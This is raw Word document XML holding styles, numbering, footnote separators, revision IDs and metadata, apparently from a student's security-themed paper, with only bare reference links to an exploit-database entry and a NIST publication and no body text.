    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="71DC7709" w14:textId="77777777" w:rsidR="008308ED" w:rsidRDefault="008308ED" w:rsidP="009F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41236"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1515066899"/>
          <w:docPartObj>
            <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
            <w:docPartUnique/>
          </w:docPartObj>
        </w:sdtPr>
        <w:sdtContent>
          <w:p w14:paraId="0CDD86B2" w14:textId="6F121D0B" w:rsidR="00E027AD" w:rsidRDefault="00E027A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04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04A6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:sdtContent>
      </w:sdt>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="09ACAB2C" w14:textId="77777777" w:rsidR="00E027AD" w:rsidRDefault="00E02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8F345" w14:textId="77777777" w:rsidR="008308ED" w:rsidRDefault="008308ED" w:rsidP="009F0749">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="101BFA49" w14:textId="77777777" w:rsidR="008308ED" w:rsidRDefault="008308ED" w:rsidP="009F0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E01"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7CBCA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91FED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B742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A27A3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A24C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3711D4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3F4A5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C7A42"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="01FEE3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E3BDD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="756A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6A"/>
    <w:rsid w:val="000328A1"/>
    <w:rsid w:val="00080CE6"/>
    <w:rsid w:val="000B6516"/>
    <w:rsid w:val="000C087C"/>
    <w:rsid w:val="000C42AC"/>
    <w:rsid w:val="000C7DE0"/>
    <w:rsid w:val="000F46CE"/>
    <w:rsid w:val="001703CE"/>
    <w:rsid w:val="00181EDD"/>
    <w:rsid w:val="0018294D"/>
    <w:rsid w:val="001A6D81"/>
    <w:rsid w:val="001E08E5"/>
    <w:rsid w:val="001F2CE7"/>
    <w:rsid w:val="00204D62"/>
    <w:rsid w:val="00204DD5"/>
    <w:rsid w:val="00213A4C"/>
    <w:rsid w:val="00274C21"/>
    <w:rsid w:val="00294DEC"/>
    <w:rsid w:val="002E1C46"/>
    <w:rsid w:val="002E7DA5"/>
    <w:rsid w:val="00343B51"/>
    <w:rsid w:val="00364BE3"/>
    <w:rsid w:val="00390EF6"/>
    <w:rsid w:val="003B6230"/>
    <w:rsid w:val="00406324"/>
    <w:rsid w:val="00411DB9"/>
    <w:rsid w:val="004363D1"/>
    <w:rsid w:val="004363E5"/>
    <w:rsid w:val="004E0CD3"/>
    <w:rsid w:val="004E130D"/>
    <w:rsid w:val="004F6A9A"/>
    <w:rsid w:val="00515C28"/>
    <w:rsid w:val="00525D34"/>
    <w:rsid w:val="0054402C"/>
    <w:rsid w:val="005508F2"/>
    <w:rsid w:val="005525CA"/>
    <w:rsid w:val="00583CCD"/>
    <w:rsid w:val="00596A33"/>
    <w:rsid w:val="005C2F04"/>
    <w:rsid w:val="005C79B8"/>
    <w:rsid w:val="00601105"/>
    <w:rsid w:val="00606B50"/>
    <w:rsid w:val="006301C2"/>
    <w:rsid w:val="00657B65"/>
    <w:rsid w:val="00696B1F"/>
    <w:rsid w:val="006E4986"/>
    <w:rsid w:val="00713B88"/>
    <w:rsid w:val="0072078B"/>
    <w:rsid w:val="0072623E"/>
    <w:rsid w:val="00742850"/>
    <w:rsid w:val="00776844"/>
    <w:rsid w:val="007A6DCF"/>
    <w:rsid w:val="007C7807"/>
    <w:rsid w:val="007D09E6"/>
    <w:rsid w:val="007D5E7E"/>
    <w:rsid w:val="00822BE1"/>
    <w:rsid w:val="008308ED"/>
    <w:rsid w:val="0087036A"/>
    <w:rsid w:val="0088108E"/>
    <w:rsid w:val="0089039D"/>
    <w:rsid w:val="008918D5"/>
    <w:rsid w:val="0089436B"/>
    <w:rsid w:val="008963FE"/>
    <w:rsid w:val="008C4A66"/>
    <w:rsid w:val="009360F8"/>
    <w:rsid w:val="00997570"/>
    <w:rsid w:val="009A0F5B"/>
    <w:rsid w:val="009E7605"/>
    <w:rsid w:val="009F0749"/>
    <w:rsid w:val="00A00D37"/>
    <w:rsid w:val="00A02CD4"/>
    <w:rsid w:val="00A178D9"/>
    <w:rsid w:val="00A520D9"/>
    <w:rsid w:val="00A6149F"/>
    <w:rsid w:val="00A6365B"/>
    <w:rsid w:val="00A81100"/>
    <w:rsid w:val="00AB13BF"/>
    <w:rsid w:val="00AD19F4"/>
    <w:rsid w:val="00AE6C4E"/>
    <w:rsid w:val="00AF0D14"/>
    <w:rsid w:val="00B16C1D"/>
    <w:rsid w:val="00B44F9B"/>
    <w:rsid w:val="00B66E87"/>
    <w:rsid w:val="00B74D1B"/>
    <w:rsid w:val="00BC52EF"/>
    <w:rsid w:val="00BD62D2"/>
    <w:rsid w:val="00BE2F6B"/>
    <w:rsid w:val="00BF3660"/>
    <w:rsid w:val="00C24581"/>
    <w:rsid w:val="00CB74C1"/>
    <w:rsid w:val="00CC19FE"/>
    <w:rsid w:val="00CC56A4"/>
    <w:rsid w:val="00CD71F9"/>
    <w:rsid w:val="00CE3DD9"/>
    <w:rsid w:val="00D43069"/>
    <w:rsid w:val="00D576D1"/>
    <w:rsid w:val="00D644ED"/>
    <w:rsid w:val="00D704E4"/>
    <w:rsid w:val="00DC185F"/>
    <w:rsid w:val="00DC4F89"/>
    <w:rsid w:val="00DD6FA8"/>
    <w:rsid w:val="00DE04A6"/>
    <w:rsid w:val="00E027AD"/>
    <w:rsid w:val="00E06D46"/>
    <w:rsid w:val="00E43413"/>
    <w:rsid w:val="00E44D11"/>
    <w:rsid w:val="00E4789C"/>
    <w:rsid w:val="00E56EA6"/>
    <w:rsid w:val="00E851B8"/>
    <w:rsid w:val="00E9522E"/>
    <w:rsid w:val="00EC3628"/>
    <w:rsid w:val="00ED0152"/>
    <w:rsid w:val="00ED670B"/>
    <w:rsid w:val="00F073CA"/>
    <w:rsid w:val="00F07544"/>
    <w:rsid w:val="00F17D28"/>
    <w:rsid w:val="00F25A1B"/>
    <w:rsid w:val="00F30B6A"/>
    <w:rsid w:val="00F45D43"/>
    <w:rsid w:val="00F534A2"/>
    <w:rsid w:val="00F6788B"/>
    <w:rsid w:val="00F73386"/>
    <w:rsid w:val="00F85A01"/>
    <w:rsid w:val="00FC1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8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5B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00204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B6A"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="001E08E5"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00204D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F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49"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009F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49"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00D6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3CE"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00B66E87"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="ja-JP"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B66E87"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B66E87"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00B66E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C4A66"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F07544"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00F45D4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51B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65B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00204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5D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B6A"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="001E08E5"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00204DD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F0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749"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009F0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749"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00D6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03CE"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00B66E87"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="ja-JP"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B66E87"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B66E87"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00B66E8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C4A66"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F07544"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00F45D4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51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95649">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="981815613">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1240558378">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1494031164">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="178175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loit-db.com/exploits/778/"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csrc.nist.gov/publications/drafts/800-118/draft-sp800-118.pdf"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1DA5B-17E5-4071-974B-5417177AF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38</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ecStudent</dc:creator>
  <cp:lastModifiedBy>dtheese</cp:lastModifiedBy>
  <cp:revision>95</cp:revision>
  <cp:lastPrinted>2015-06-14T20:29:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-05-31T15:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-06-14T22:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>